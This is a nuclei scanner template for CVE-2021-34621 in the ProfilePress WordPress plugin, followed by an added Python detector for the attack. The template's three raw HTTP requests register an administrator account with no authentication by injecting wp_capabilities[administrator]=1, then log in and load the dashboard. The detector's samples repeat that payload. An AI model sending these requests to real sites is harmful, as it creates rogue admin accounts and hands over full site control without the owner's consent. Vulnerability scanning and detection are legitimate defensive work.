id: CVE-2021-34621

info:
  name: WordPress ProfilePress 3.0.0-3.1.3 - Admin User Creation Weakness
  author: 0xsapra
  severity: critical
  description: |
    The user registration component of the ProfilePress WordPress plugin (~/src/Classes/RegistrationAuth.php) honours a caller-supplied wp_capabilities field submitted with the signup form (the pp_ajax_signup AJAX action), so an unauthenticated visitor can register an account that is created with the administrator role.
  impact: |
    An attacker can exploit this vulnerability to create unauthorized admin accounts and gain full control over the WordPress site.
  remediation: |
    Update to ProfilePress 3.1.4 or later. Audit the users table for unexpected administrator accounts created while a vulnerable version was installed.
  reference:
    - https://www.wordfence.com/blog/2021/06/easily-exploitable-critical-vulnerabilities-patched-in-profilepress-plugin/
    - https://nvd.nist.gov/vuln/detail/CVE-2021-34621
    - http://packetstormsecurity.com/files/163973/WordPress-ProfilePress-3.1.3-Privilege-Escalation.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-34621
    cwe-id: CWE-306,CWE-269
    epss-score: 0.7888
    epss-percentile: 0.97984
    cpe: cpe:2.3:a:properfraction:profilepress:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 3
    vendor: properfraction
    product: profilepress
    framework: wordpress
  tags: cve2021,cve,wordpress,wp-plugin,packetstorm,intrusive,properfraction

# NOTE: this template is tagged intrusive because request 1 creates a real user
# on the target. Remove the account ({{randstr}} / {{randstr}}@interact.sh) after testing.
http:
  - raw:
      # Request 1: unauthenticated signup. wp_capabilities[administrator]=1 is the
      # field the vulnerable handler copies into the new user record.
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json, text/javascript, */*; q=0.01
        Content-Type: multipart/form-data; boundary=---------------------------138742543134772812001999326589
        Origin: {{BaseURL}}
        Referer: {{BaseURL}}

        -----------------------------138742543134772812001999326589
        Content-Disposition: form-data; name="reg_username"

        {{randstr}}
        -----------------------------138742543134772812001999326589
        Content-Disposition: form-data; name="reg_email"

        {{randstr}}@interact.sh
        -----------------------------138742543134772812001999326589
        Content-Disposition: form-data; name="reg_password"

        {{randstr}}@interact.sh
        -----------------------------138742543134772812001999326589
        Content-Disposition: form-data; name="reg_password_present"

        true
        -----------------------------138742543134772812001999326589
        Content-Disposition: form-data; name="reg_first_name"

        {{randstr}}@interact.sh
        -----------------------------138742543134772812001999326589
        Content-Disposition: form-data; name="reg_last_name"

        {{randstr}}@interact.sh
        -----------------------------138742543134772812001999326589
        Content-Disposition: form-data; name="_wp_http_referer"

        /wp/?page_id=18
        -----------------------------138742543134772812001999326589
        Content-Disposition: form-data; name="pp_current_url"

        {{BaseURL}}
        -----------------------------138742543134772812001999326589
        Content-Disposition: form-data; name="wp_capabilities[administrator]"

        1
        -----------------------------138742543134772812001999326589
        Content-Disposition: form-data; name="signup_form_id"

        1
        -----------------------------138742543134772812001999326589
        Content-Disposition: form-data; name="signup_referrer_page"


        -----------------------------138742543134772812001999326589
        Content-Disposition: form-data; name="action"

        pp_ajax_signup
        -----------------------------138742543134772812001999326589
        Content-Disposition: form-data; name="melange_id"


        -----------------------------138742543134772812001999326589--

      # Request 2: log in as the account just created (WordPress accepts the
      # e-mail address as the login name; the password matches reg_password above).
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json, text/javascript, */*; q=0.01
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
        Origin: {{BaseURL}}
        Referer: {{BaseURL}}

        log={{randstr}}@interact.sh&pwd={{randstr}}@interact.sh&wp-submit=Log+In

      # Request 3: fetch the dashboard with the session from request 2.
      - |
        GET /wp-admin/ HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Connection: close

    # Required so the wordpress_logged_in_* cookie set by request 2 is sent with
    # request 3; without it the dashboard request is unauthenticated and is
    # redirected to wp-login.php, so the matcher below never fires.
    cookie-reuse: true

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - Welcome to your WordPress Dashboard

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100ada3493f206abd735b16deb87788c4c837ad79b21b18a91eb6c5271f9b2e87620220553d246455cb93e3e3c8c33a06b8ba3a6fdb714db165681c77ed54d827d2aa7f:922c64590222798bb761d5b6d8e72950
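The signup request above is the whole attack: a pp_ajax_signup POST that carries wp_capabilities[administrator]=1. Defenders who log POST bodies at a WAF or reverse proxy can flag that shape directly. The following is an added detection example, not part of the nuclei template or of the ProfilePress plugin. It parses a captured multipart/form-data body, extracts the form fields, and reports any pp_ajax_signup request that tries to set a role or capability. The sample requests are constructed here for the example; the key names other than wp_capabilities (role, wp_user_level, user_level) are assumptions about what a signup form should never be allowed to set, not fields taken from the advisory.

```python
"""Flag ProfilePress-style signup requests that smuggle role/capability fields.

Added illustration for CVE-2021-34621; not nuclei or ProfilePress code.
Input: captured (Content-Type, body) pairs from a proxy or WAF that logs POST
bodies. The SAMPLES below are constructed for this example.
"""
import email
import re

# Form keys an unauthenticated signup must never be allowed to set. The
# template abuses wp_capabilities[administrator]; the other names are
# assumptions covering sibling user-record fields, not from the advisory.
PRIV_KEY = re.compile(r"^(wp_capabilities(\[[^\]]*\])?|role|wp_user_level|user_level)$")

# AJAX action used by the vulnerable registration handler (from the template).
SIGNUP_ACTION = "pp_ajax_signup"


def build_multipart(fields, boundary):
    """Encode {name: value} as a multipart/form-data body (used to build samples)."""
    lines = []
    for name, value in fields.items():
        lines += [f"--{boundary}",
                  f'Content-Disposition: form-data; name="{name}"',
                  "", value]
    lines += [f"--{boundary}--", ""]
    return "\r\n".join(lines).encode()


def parse_multipart(content_type, body):
    """Return {field_name: value} for every form-data part in the body.

    The stdlib email parser understands multipart bodies once the request's
    Content-Type header is prepended; it also drops the CRLF that belongs to
    the following boundary, so values come back exactly as submitted.
    """
    raw = f"Content-Type: {content_type}\r\n\r\n".encode() + body
    msg = email.message_from_bytes(raw)
    fields = {}
    if not msg.is_multipart():
        return fields
    for part in msg.get_payload():
        name = part.get_param("name", header="content-disposition")
        if name is None:
            continue
        data = part.get_payload(decode=True) or b""
        fields[name] = data.decode("utf-8", "replace")
    return fields


def privileged_keys(fields):
    """Keys in a pp_ajax_signup request that try to set a role or capability."""
    if fields.get("action") != SIGNUP_ACTION:
        return []
    return sorted(k for k in fields if PRIV_KEY.match(k))


def scan(requests):
    """requests: list of (content_type, body). Returns [(index, offending_keys)]."""
    hits = []
    for i, (ctype, body) in enumerate(requests):
        keys = privileged_keys(parse_multipart(ctype, body))
        if keys:
            hits.append((i, keys))
    return hits


BOUNDARY = "---------------------------138742543134772812001999326589"
CTYPE = f"multipart/form-data; boundary={BOUNDARY}"

# Constructed samples: 0 mirrors the template's exploit request, 1 is a benign
# signup, 2 carries a role key under a different action (not a signup, so this
# rule does not flag it).
SAMPLES = [
    (CTYPE, build_multipart({
        "reg_username": "zqkx", "reg_email": "zqkx@example.invalid",
        "reg_password": "p", "wp_capabilities[administrator]": "1",
        "signup_form_id": "1", "action": SIGNUP_ACTION, "melange_id": ""}, BOUNDARY)),
    (CTYPE, build_multipart({
        "reg_username": "alice", "reg_email": "alice@example.invalid",
        "reg_password": "p", "signup_form_id": "1", "action": SIGNUP_ACTION}, BOUNDARY)),
    (CTYPE, build_multipart({
        "role": "administrator", "action": "heartbeat"}, BOUNDARY)),
]

if __name__ == "__main__":
    for idx, keys in scan(SAMPLES):
        print(f"request {idx}: signup carrying privileged fields {keys}")
```

The rule keys on the action name plus the field names rather than on the literal value 1, so wp_capabilities[editor] or role=administrator in the same request are caught too; if the proxy only logs URL-encoded bodies, swap parse_multipart for urllib.parse.parse_qs and keep privileged_keys as is.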